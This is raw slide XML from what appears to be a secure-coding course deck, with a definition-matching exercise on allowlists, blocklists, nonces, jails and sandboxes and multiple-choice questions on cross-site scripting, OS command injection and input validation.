              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Jail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Sandbox Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906DD01F-A60E-4502-9DB9-051232133551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="1981200"/>
            <a:ext cx="5562600" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600"/>
              <a:t>A set of resource limits imposed on programs by the operating system kernel (e.g. I/O bandwidth caps &amp; disk quotas).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600"/>
              <a:t>Uses a time-sensitive mark to prevent packet replay (e.g. CAPTCHA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600"/>
              <a:t>List of acceptable input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600"/>
              <a:t>A security mechanism for quarantining untrusted running programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600"/>
              <a:t>Reject suspect input</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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECDB3315-0746-48AA-BAB0-C372CF6B49B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Definition Matching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADF33FDE-2686-470F-A6BE-E5830B87BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="1981200" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Allowlist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Blocklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Jail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Sandbox Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70660" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C4AD2DD-87AD-4873-840A-501AFBFF7729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="1981200"/>
            <a:ext cx="5562600" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>A set of resource limits imposed on programs by the operating system kernel (e.g. I/O bandwidth caps &amp; disk quotas).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Uses a time-sensitive mark to prevent packet replay (e.g. CAPTCHA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>List of acceptable input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>A security mechanism for quarantining untrusted running programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>Reject suspect input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70661" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E1FACD2-35C1-4C13-9B7A-455846C25EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="2209800"/>
            <a:ext cx="1600200" cy="1905000"/>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70662" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E122A543-AD2B-406A-8AB4-2A7278B99C98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="2971800"/>
            <a:ext cx="1600200" cy="3048000"/>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70663" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D55BF7-4932-4239-88B5-9DAEB288DD2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1371600" y="3276600"/>
            <a:ext cx="1828800" cy="381000"/>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70664" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0921F68A-834D-4563-8550-725064966472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="990600" y="2209800"/>
            <a:ext cx="2209800" cy="2133600"/>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70665" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5349588-69CC-4497-8615-662D100B71DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1676400" y="5029200"/>
            <a:ext cx="1371600" cy="228600"/>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3EF92F92-693F-466E-AF64-58FA63FDB49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6EA9562-CB7A-4C4C-8222-9951457F8CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>     A third party inserts attack data into another organization’s html response.  This is known as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Negative check or blocklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Race Condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Cleartext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7680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4A2812F5-3C92-42FF-892D-40CDECE60A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B6D57F0-51E3-47E6-8FCC-B1DA1B802D56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    What technique would NOT be appropriate in avoiding OS Command Injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Separate control information from data information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Use library calls instead of external processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Run code in “jail” or other sandbox environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Use a hard-coded password to enable access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US"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86019">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689FC586-F38C-4E25-B4B3-71C89309DDF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{417A652B-9145-4FFF-82E1-E9DC72BE0BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>     Which of the following is true concerning web servers?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Servers cannot retain web session state, and thus the client must do it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>The single best place to do input validation and authentication is at the client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Using client as storage is safe if encryption, nonce and hashes are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>The server can trust web input if it validates the data in the web form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US"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8704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382F8239-AF1B-4494-B407-548F0027C448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Question</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{875E9CA6-E143-4371-B853-7BABE01C8C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>     The BEST way to ensure input validity at the client is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
